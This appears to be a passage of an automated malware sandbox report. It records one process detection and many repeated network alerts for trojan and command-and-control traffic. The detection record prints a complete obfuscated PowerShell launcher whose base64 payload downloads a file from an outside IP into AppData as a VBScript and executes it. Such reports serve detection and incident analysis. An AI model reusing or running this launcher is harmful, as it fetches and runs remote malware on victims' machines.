                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", ProcessId: 2364, ProcessName: csc.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:32.403357+010020243121A Network Trojan was detected192.168.2.54976194.156.177.9580TCP
                2024-11-15T18:14:33.528121+010020243121A Network Trojan was detected192.168.2.54976694.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:31.426231+010020253811Malware Command and Control Activity Detected192.168.2.54976194.156.177.9580TCP
                2024-11-15T18:14:32.580658+010020253811Malware Command and Control Activity Detected192.168.2.54976694.156.177.9580TCP
                2024-11-15T18:14:33.648797+010020253811Malware Command and Control Activity Detected192.168.2.54977194.156.177.9580TCP
                2024-11-15T18:14:34.779935+010020253811Malware Command and Control Activity Detected192.168.2.54977694.156.177.9580TCP
                2024-11-15T18:14:35.927180+010020253811Malware Command and Control Activity Detected192.168.2.54978594.156.177.9580TCP
                2024-11-15T18:14:37.042044+010020253811Malware Command and Control Activity Detected192.168.2.54979094.156.177.9580TCP
                2024-11-15T18:14:38.155116+010020253811Malware Command and Control Activity Detected192.168.2.54979594.156.177.9580TCP
                2024-11-15T18:14:39.310499+010020253811Malware Command and Control Activity Detected192.168.2.54980194.156.177.9580TCP
                2024-11-15T18:14:40.418721+010020253811Malware Command and Control Activity Detected192.168.2.54980794.156.177.9580TCP
                2024-11-15T18:14:41.540423+010020253811Malware Command and Control Activity Detected192.168.2.54981194.156.177.9580TCP
                2024-11-15T18:14:42.666273+010020253811Malware Command and Control Activity Detected192.168.2.54981594.156.177.9580TCP
                2024-11-15T18:14:43.780827+010020253811Malware Command and Control Activity Detected192.168.2.54982094.156.177.9580TCP
                2024-11-15T18:14:44.948157+010020253811Malware Command and Control Activity Detected192.168.2.54982794.156.177.9580TCP
                2024-11-15T18:14:47.565744+010020253811Malware Command and Control Activity Detected192.168.2.54983994.156.177.9580TCP
                2024-11-15T18:14:48.732748+010020253811Malware Command and Control Activity Detected192.168.2.54984594.156.177.9580TCP
                2024-11-15T18:14:49.866643+010020253811Malware Command and Control Activity Detected192.168.2.54985194.156.177.9580TCP
                2024-11-15T18:14:51.015684+010020253811Malware Command and Control Activity Detected192.168.2.54985694.156.177.9580TCP
                2024-11-15T18:14:52.116189+010020253811Malware Command and Control Activity Detected192.168.2.54986294.156.177.9580TCP
                2024-11-15T18:14:53.231994+010020253811Malware Command and Control Activity Detected192.168.2.54986994.156.177.9580TCP
                2024-11-15T18:14:54.415833+010020253811Malware Command and Control Activity Detected192.168.2.54987594.156.177.9580TCP
                2024-11-15T18:14:55.567481+010020253811Malware Command and Control Activity Detected192.168.2.54988094.156.177.9580TCP
                2024-11-15T18:14:56.697888+010020253811Malware Command and Control Activity Detected192.168.2.54988594.156.177.9580TCP
                2024-11-15T18:14:57.888076+010020253811Malware Command and Control Activity Detected192.168.2.54988994.156.177.9580TCP
                2024-11-15T18:14:59.477956+010020253811Malware Command and Control Activity Detected192.168.2.54989794.156.177.9580TCP
                2024-11-15T18:15:00.622720+010020253811Malware Command and Control Activity Detected192.168.2.54990194.156.177.9580TCP
                2024-11-15T18:15:01.716470+010020253811Malware Command and Control Activity Detected192.168.2.54990594.156.177.9580TCP
                2024-11-15T18:15:02.843351+010020253811Malware Command and Control Activity Detected192.168.2.54990994.156.177.9580TCP
                2024-11-15T18:15:03.944044+010020253811Malware Command and Control Activity Detected192.168.2.54991594.156.177.9580TCP
                2024-11-15T18:15:05.079130+010020253811Malware Command and Control Activity Detected192.168.2.54992094.156.177.9580TCP
                2024-11-15T18:15:06.232263+010020253811Malware Command and Control Activity Detected192.168.2.54992594.156.177.9580TCP
                2024-11-15T18:15:07.371818+010020253811Malware Command and Control Activity Detected192.168.2.54993194.156.177.9580TCP
                2024-11-15T18:15:08.527825+010020253811Malware Command and Control Activity Detected192.168.2.54993594.156.177.9580TCP
                2024-11-15T18:15:09.646081+010020253811Malware Command and Control Activity Detected192.168.2.54994194.156.177.9580TCP
                2024-11-15T18:15:10.738508+010020253811Malware Command and Control Activity Detected192.168.2.54994794.156.177.9580TCP
                2024-11-15T18:15:11.909051+010020253811Malware Command and Control Activity Detected192.168.2.54995294.156.177.9580TCP
                2024-11-15T18:15:13.033207+010020253811Malware Command and Control Activity Detected192.168.2.54995994.156.177.9580TCP
                2024-11-15T18:15:14.143909+010020253811Malware Command and Control Activity Detected192.168.2.54996594.156.177.9580TCP
                2024-11-15T18:15:15.260992+010020253811Malware Command and Control Activity Detected192.168.2.54997194.156.177.9580TCP
                2024-11-15T18:15:16.354360+010020253811Malware Command and Control Activity Detected192.168.2.54997694.156.177.9580TCP
                2024-11-15T18:15:17.488009+010020253811Malware Command and Control Activity Detected192.168.2.54998494.156.177.9580TCP
                2024-11-15T18:15:18.648637+010020253811Malware Command and Control Activity Detected192.168.2.54999194.156.177.9580TCP
                2024-11-15T18:15:19.770914+010020253811Malware Command and Control Activity Detected192.168.2.54999994.156.177.9580TCP
                2024-11-15T18:15:21.183194+010020253811Malware Command and Control Activity Detected192.168.2.55000694.156.177.9580TCP
                2024-11-15T18:15:22.276771+010020253811Malware Command and Control Activity Detected192.168.2.55001494.156.177.9580TCP
                2024-11-15T18:15:23.386905+010020253811Malware Command and Control Activity Detected192.168.2.55002294.156.177.9580TCP
                2024-11-15T18:15:24.486068+010020253811Malware Command and Control Activity Detected192.168.2.55002394.156.177.9580TCP
                2024-11-15T18:15:26.198172+010020253811Malware Command and Control Activity Detected192.168.2.55002494.156.177.9580TCP
                2024-11-15T18:15:27.680897+010020253811Malware Command and Control Activity Detected192.168.2.55002594.156.177.9580TCP
                2024-11-15T18:15:28.793698+010020253811Malware Command and Control Activity Detected192.168.2.55002694.156.177.9580TCP
                2024-11-15T18:15:29.925408+010020253811Malware Command and Control Activity Detected192.168.2.55002794.156.177.9580TCP
                2024-11-15T18:15:31.052611+010020253811Malware Command and Control Activity Detected192.168.2.55002894.156.177.9580TCP
                2024-11-15T18:15:32.214108+010020253811Malware Command and Control Activity Detected192.168.2.55002994.156.177.9580TCP
                2024-11-15T18:15:33.332376+010020253811Malware Command and Control Activity Detected192.168.2.55003094.156.177.9580TCP
                2024-11-15T18:15:34.479837+010020253811Malware Command and Control Activity Detected192.168.2.55003194.156.177.9580TCP
                2024-11-15T18:15:35.618188+010020253811Malware Command and Control Activity Detected192.168.2.55003294.156.177.9580TCP
                2024-11-15T18:15:36.745165+010020253811Malware Command and Control Activity Detected192.168.2.55003394.156.177.9580TCP
                2024-11-15T18:15:37.835646+010020253811Malware Command and Control Activity Detected192.168.2.55003494.156.177.9580TCP
                2024-11-15T18:15:38.930011+010020253811Malware Command and Control Activity Detected192.168.2.55003594.156.177.9580TCP
                2024-11-15T18:15:40.041826+010020253811Malware Command and Control Activity Detected192.168.2.55003694.156.177.9580TCP
                2024-11-15T18:15:41.133212+010020253811Malware Command and Control Activity Detected192.168.2.55003794.156.177.9580TCP
                2024-11-15T18:15:42.287477+010020253811Malware Command and Control Activity Detected192.168.2.55003894.156.177.9580TCP
                2024-11-15T18:15:43.432085+010020253811Malware Command and Control Activity Detected192.168.2.55003994.156.177.9580TCP
                2024-11-15T18:15:44.558614+010020253811Malware Command and Control Activity Detected192.168.2.55004094.156.177.9580TCP
                2024-11-15T18:15:45.645313+010020253811Malware Command and Control Activity Detected192.168.2.55004194.156.177.9580TCP
                2024-11-15T18:15:46.938497+010020253811Malware Command and Control Activity Detected192.168.2.55004294.156.177.9580TCP
                2024-11-15T18:15:48.053000+010020253811Malware Command and Control Activity Detected192.168.2.55004394.156.177.9580TCP
                2024-11-15T18:15:49.198772+010020253811Malware Command and Control Activity Detected192.168.2.55004494.156.177.9580TCP
                2024-11-15T18:15:51.314217+010020253811Malware Command and Control Activity Detected192.168.2.55004594.156.177.9580TCP
                2024-11-15T18:15:52.472929+010020253811Malware Command and Control Activity Detected192.168.2.55004694.156.177.9580TCP
                2024-11-15T18:15:53.951386+010020253811Malware Command and Control Activity Detected192.168.2.55004794.156.177.9580TCP
                2024-11-15T18:15:55.077914+010020253811Malware Command and Control Activity Detected192.168.2.55004894.156.177.9580TCP
                2024-11-15T18:15:56.206763+010020253811Malware Command and Control Activity Detected192.168.2.55004994.156.177.9580TCP
                2024-11-15T18:15:57.353617+010020253811Malware Command and Control Activity Detected192.168.2.55005094.156.177.9580TCP
                2024-11-15T18:15:58.470891+010020253811Malware Command and Control Activity Detected192.168.2.55005194.156.177.9580TCP
                2024-11-15T18:15:59.601399+010020253811Malware Command and Control Activity Detected192.168.2.55005294.156.177.9580TCP
                2024-11-15T18:16:00.728619+010020253811Malware Command and Control Activity Detected192.168.2.55005394.156.177.9580TCP
                2024-11-15T18:16:01.834858+010020253811Malware Command and Control Activity Detected192.168.2.55005494.156.177.9580TCP
                2024-11-15T18:16:03.165663+010020253811Malware Command and Control Activity Detected192.168.2.55005594.156.177.9580TCP
                2024-11-15T18:16:04.337364+010020253811Malware Command and Control Activity Detected192.168.2.55005694.156.177.9580TCP
                2024-11-15T18:16:05.839274+010020253811Malware Command and Control Activity Detected192.168.2.55005794.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:34.621400+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549771TCP
                2024-11-15T18:14:35.757468+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549776TCP
                2024-11-15T18:14:36.867216+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549785TCP
                2024-11-15T18:14:38.000486+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549790TCP
                2024-11-15T18:14:39.118238+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549795TCP
                2024-11-15T18:14:40.267944+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549801TCP
                2024-11-15T18:14:41.391581+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549807TCP
                2024-11-15T18:14:42.512208+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549811TCP
                2024-11-15T18:14:43.617333+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549815TCP
                2024-11-15T18:14:44.796883+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549820TCP
                2024-11-15T18:14:47.382329+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549827TCP
                2024-11-15T18:14:48.534810+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549839TCP
                2024-11-15T18:14:49.707074+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549845TCP
                2024-11-15T18:14:50.829216+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549851TCP
                2024-11-15T18:14:51.964278+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549856TCP
                2024-11-15T18:14:53.069205+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549862TCP
                2024-11-15T18:14:54.213464+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549869TCP
                2024-11-15T18:14:55.434663+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549875TCP
                2024-11-15T18:14:56.546595+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549880TCP
                2024-11-15T18:14:57.681469+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549885TCP
                2024-11-15T18:14:59.322192+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549889TCP
                2024-11-15T18:15:00.442485+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549897TCP
                2024-11-15T18:15:01.562051+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549901TCP
                2024-11-15T18:15:02.681975+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549905TCP
                2024-11-15T18:15:03.792789+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549909TCP
                2024-11-15T18:15:04.915936+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549915TCP
                2024-11-15T18:15:06.070494+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549920TCP
                2024-11-15T18:15:07.212159+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549925TCP
                2024-11-15T18:15:08.368386+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549931TCP
                2024-11-15T18:15:09.483923+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549935TCP
                2024-11-15T18:15:10.593620+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549941TCP
                2024-11-15T18:15:11.704837+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549947TCP
                2024-11-15T18:15:12.856000+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549952TCP
                2024-11-15T18:15:13.992144+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549959TCP
                2024-11-15T18:15:15.100964+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549965TCP
                2024-11-15T18:15:16.196125+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549971TCP
                2024-11-15T18:15:17.335539+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549976TCP
                2024-11-15T18:15:18.454312+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549984TCP
                2024-11-15T18:15:19.624026+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549991TCP
                2024-11-15T18:15:20.784082+010020254831A Network Trojan was detected94.156.177.9580192.168.2.549999TCP
                2024-11-15T18:15:22.101011+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550006TCP
                2024-11-15T18:15:23.210169+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550014TCP
                2024-11-15T18:15:24.323159+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550022TCP
                2024-11-15T18:15:26.047516+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550023TCP
                2024-11-15T18:15:27.526873+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550024TCP
                2024-11-15T18:15:28.646915+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550025TCP
                2024-11-15T18:15:29.760486+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550026TCP
                2024-11-15T18:15:30.900416+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550027TCP
                2024-11-15T18:15:32.054223+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550028TCP
                2024-11-15T18:15:33.173572+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550029TCP
                2024-11-15T18:15:34.327921+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550030TCP
                2024-11-15T18:15:35.466271+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550031TCP
                2024-11-15T18:15:36.589634+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550032TCP
                2024-11-15T18:15:37.687213+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550033TCP
                2024-11-15T18:15:38.780886+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550034TCP
                2024-11-15T18:15:39.888799+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550035TCP
                2024-11-15T18:15:40.983503+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550036TCP
                2024-11-15T18:15:42.133977+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550037TCP
                2024-11-15T18:15:43.281944+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550038TCP
                2024-11-15T18:15:44.438768+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550039TCP
                2024-11-15T18:15:45.503504+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550040TCP
                2024-11-15T18:15:46.641061+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550041TCP
                2024-11-15T18:15:47.905044+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550042TCP
                2024-11-15T18:15:49.013886+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550043TCP
                2024-11-15T18:15:50.176256+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550044TCP
                2024-11-15T18:15:52.309323+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550045TCP
                2024-11-15T18:15:53.790066+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550046TCP
                2024-11-15T18:15:54.922369+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550047TCP
                2024-11-15T18:15:56.061021+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550048TCP
                2024-11-15T18:15:57.195280+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550049TCP
                2024-11-15T18:15:58.307066+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550050TCP
                2024-11-15T18:15:59.445468+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550051TCP
                2024-11-15T18:16:00.581983+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550052TCP
                2024-11-15T18:16:01.682183+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550053TCP
                2024-11-15T18:16:02.821050+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550054TCP
                2024-11-15T18:16:04.174978+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550055TCP
                2024-11-15T18:16:05.368969+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550056TCP
                2024-11-15T18:16:06.523288+010020254831A Network Trojan was detected94.156.177.9580192.168.2.550057TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:34.615993+010020243131Malware Command and Control Activity Detected192.168.2.54977194.156.177.9580TCP
                2024-11-15T18:14:35.751845+010020243131Malware Command and Control Activity Detected192.168.2.54977694.156.177.9580TCP
                2024-11-15T18:14:36.861902+010020243131Malware Command and Control Activity Detected192.168.2.54978594.156.177.9580TCP
                2024-11-15T18:14:37.995017+010020243131Malware Command and Control Activity Detected192.168.2.54979094.156.177.9580TCP
                2024-11-15T18:14:39.112509+010020243131Malware Command and Control Activity Detected192.168.2.54979594.156.177.9580TCP
                2024-11-15T18:14:40.262543+010020243131Malware Command and Control Activity Detected192.168.2.54980194.156.177.9580TCP
                2024-11-15T18:14:41.385022+010020243131Malware Command and Control Activity Detected192.168.2.54980794.156.177.9580TCP
                2024-11-15T18:14:42.507084+010020243131Malware Command and Control Activity Detected192.168.2.54981194.156.177.9580TCP
                2024-11-15T18:14:43.612001+010020243131Malware Command and Control Activity Detected192.168.2.54981594.156.177.9580TCP
                2024-11-15T18:14:44.789085+010020243131Malware Command and Control Activity Detected192.168.2.54982094.156.177.9580TCP
                2024-11-15T18:14:47.376347+010020243131Malware Command and Control Activity Detected192.168.2.54982794.156.177.9580TCP
                2024-11-15T18:14:48.529208+010020243131Malware Command and Control Activity Detected192.168.2.54983994.156.177.9580TCP
                2024-11-15T18:14:49.701579+010020243131Malware Command and Control Activity Detected192.168.2.54984594.156.177.9580TCP
                2024-11-15T18:14:50.823890+010020243131Malware Command and Control Activity Detected192.168.2.54985194.156.177.9580TCP
                2024-11-15T18:14:51.959024+010020243131Malware Command and Control Activity Detected192.168.2.54985694.156.177.9580TCP
                2024-11-15T18:14:53.063828+010020243131Malware Command and Control Activity Detected192.168.2.54986294.156.177.9580TCP
                2024-11-15T18:14:54.208036+010020243131Malware Command and Control Activity Detected192.168.2.54986994.156.177.9580TCP
                2024-11-15T18:14:55.402259+010020243131Malware Command and Control Activity Detected192.168.2.54987594.156.177.9580TCP
                2024-11-15T18:14:56.541320+010020243131Malware Command and Control Activity Detected192.168.2.54988094.156.177.9580TCP
                2024-11-15T18:14:57.675629+010020243131Malware Command and Control Activity Detected192.168.2.54988594.156.177.9580TCP
                2024-11-15T18:14:59.316568+010020243131Malware Command and Control Activity Detected192.168.2.54988994.156.177.9580TCP
                2024-11-15T18:15:00.437229+010020243131Malware Command and Control Activity Detected192.168.2.54989794.156.177.9580TCP
                2024-11-15T18:15:01.556689+010020243131Malware Command and Control Activity Detected192.168.2.54990194.156.177.9580TCP
                2024-11-15T18:15:02.676612+010020243131Malware Command and Control Activity Detected192.168.2.54990594.156.177.9580TCP
                2024-11-15T18:15:03.787032+010020243131Malware Command and Control Activity Detected192.168.2.54990994.156.177.9580TCP
                2024-11-15T18:15:04.910372+010020243131Malware Command and Control Activity Detected192.168.2.54991594.156.177.9580TCP
                2024-11-15T18:15:06.064903+010020243131Malware Command and Control Activity Detected192.168.2.54992094.156.177.9580TCP
                2024-11-15T18:15:07.206218+010020243131Malware Command and Control Activity Detected192.168.2.54992594.156.177.9580TCP
                2024-11-15T18:15:08.362963+010020243131Malware Command and Control Activity Detected192.168.2.54993194.156.177.9580TCP
                2024-11-15T18:15:09.478766+010020243131Malware Command and Control Activity Detected192.168.2.54993594.156.177.9580TCP
                2024-11-15T18:15:10.588289+010020243131Malware Command and Control Activity Detected192.168.2.54994194.156.177.9580TCP
                2024-11-15T18:15:11.699501+010020243131Malware Command and Control Activity Detected192.168.2.54994794.156.177.9580TCP
                2024-11-15T18:15:12.850507+010020243131Malware Command and Control Activity Detected192.168.2.54995294.156.177.9580TCP
                2024-11-15T18:15:13.986959+010020243131Malware Command and Control Activity Detected192.168.2.54995994.156.177.9580TCP
                2024-11-15T18:15:15.095886+010020243131Malware Command and Control Activity Detected192.168.2.54996594.156.177.9580TCP
                2024-11-15T18:15:16.190598+010020243131Malware Command and Control Activity Detected192.168.2.54997194.156.177.9580TCP
                2024-11-15T18:15:17.330232+010020243131Malware Command and Control Activity Detected192.168.2.54997694.156.177.9580TCP
                2024-11-15T18:15:18.444210+010020243131Malware Command and Control Activity Detected192.168.2.54998494.156.177.9580TCP
                2024-11-15T18:15:19.618198+010020243131Malware Command and Control Activity Detected192.168.2.54999194.156.177.9580TCP
                2024-11-15T18:15:20.778565+010020243131Malware Command and Control Activity Detected192.168.2.54999994.156.177.9580TCP
                2024-11-15T18:15:22.095646+010020243131Malware Command and Control Activity Detected192.168.2.55000694.156.177.9580TCP
                2024-11-15T18:15:23.204415+010020243131Malware Command and Control Activity Detected192.168.2.55001494.156.177.9580TCP
                2024-11-15T18:15:24.317698+010020243131Malware Command and Control Activity Detected192.168.2.55002294.156.177.9580TCP
                2024-11-15T18:15:26.042078+010020243131Malware Command and Control Activity Detected192.168.2.55002394.156.177.9580TCP
                2024-11-15T18:15:27.521568+010020243131Malware Command and Control Activity Detected192.168.2.55002494.156.177.9580TCP
                2024-11-15T18:15:28.641531+010020243131Malware Command and Control Activity Detected192.168.2.55002594.156.177.9580TCP
                2024-11-15T18:15:29.755022+010020243131Malware Command and Control Activity Detected192.168.2.55002694.156.177.9580TCP
                2024-11-15T18:15:30.895119+010020243131Malware Command and Control Activity Detected192.168.2.55002794.156.177.9580TCP
                2024-11-15T18:15:32.048760+010020243131Malware Command and Control Activity Detected192.168.2.55002894.156.177.9580TCP
                2024-11-15T18:15:33.168332+010020243131Malware Command and Control Activity Detected192.168.2.55002994.156.177.9580TCP
                2024-11-15T18:15:34.322493+010020243131Malware Command and Control Activity Detected192.168.2.55003094.156.177.9580TCP
                2024-11-15T18:15:35.461033+010020243131Malware Command and Control Activity Detected192.168.2.55003194.156.177.9580TCP
                2024-11-15T18:15:36.584405+010020243131Malware Command and Control Activity Detected192.168.2.55003294.156.177.9580TCP
                2024-11-15T18:15:37.681743+010020243131Malware Command and Control Activity Detected192.168.2.55003394.156.177.9580TCP
                2024-11-15T18:15:38.775422+010020243131Malware Command and Control Activity Detected192.168.2.55003494.156.177.9580TCP
                2024-11-15T18:15:39.883593+010020243131Malware Command and Control Activity Detected192.168.2.55003594.156.177.9580TCP
                2024-11-15T18:15:40.978031+010020243131Malware Command and Control Activity Detected192.168.2.55003694.156.177.9580TCP
                2024-11-15T18:15:42.128775+010020243131Malware Command and Control Activity Detected192.168.2.55003794.156.177.9580TCP
                2024-11-15T18:15:43.271865+010020243131Malware Command and Control Activity Detected192.168.2.55003894.156.177.9580TCP
                2024-11-15T18:15:44.406130+010020243131Malware Command and Control Activity Detected192.168.2.55003994.156.177.9580TCP
                2024-11-15T18:15:45.498060+010020243131Malware Command and Control Activity Detected192.168.2.55004094.156.177.9580TCP
                2024-11-15T18:15:46.635568+010020243131Malware Command and Control Activity Detected192.168.2.55004194.156.177.9580TCP
                2024-11-15T18:15:47.899602+010020243131Malware Command and Control Activity Detected192.168.2.55004294.156.177.9580TCP
                2024-11-15T18:15:49.008238+010020243131Malware Command and Control Activity Detected192.168.2.55004394.156.177.9580TCP
                2024-11-15T18:15:50.170092+010020243131Malware Command and Control Activity Detected192.168.2.55004494.156.177.9580TCP
                2024-11-15T18:15:52.304139+010020243131Malware Command and Control Activity Detected192.168.2.55004594.156.177.9580TCP
                2024-11-15T18:15:53.784154+010020243131Malware Command and Control Activity Detected192.168.2.55004694.156.177.9580TCP
                2024-11-15T18:15:54.916540+010020243131Malware Command and Control Activity Detected192.168.2.55004794.156.177.9580TCP
                2024-11-15T18:15:56.055649+010020243131Malware Command and Control Activity Detected192.168.2.55004894.156.177.9580TCP
                2024-11-15T18:15:57.189916+010020243131Malware Command and Control Activity Detected192.168.2.55004994.156.177.9580TCP
                2024-11-15T18:15:58.301640+010020243131Malware Command and Control Activity Detected192.168.2.55005094.156.177.9580TCP
                2024-11-15T18:15:59.440010+010020243131Malware Command and Control Activity Detected192.168.2.55005194.156.177.9580TCP
                2024-11-15T18:16:00.576896+010020243131Malware Command and Control Activity Detected192.168.2.55005294.156.177.9580TCP
                2024-11-15T18:16:01.676781+010020243131Malware Command and Control Activity Detected192.168.2.55005394.156.177.9580TCP
                2024-11-15T18:16:02.815850+010020243131Malware Command and Control Activity Detected192.168.2.55005494.156.177.9580TCP
                2024-11-15T18:16:04.169499+010020243131Malware Command and Control Activity Detected192.168.2.55005594.156.177.9580TCP
                2024-11-15T18:16:05.363656+010020243131Malware Command and Control Activity Detected192.168.2.55005694.156.177.9580TCP
                2024-11-15T18:16:06.517735+010020243131Malware Command and Control Activity Detected192.168.2.55005794.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
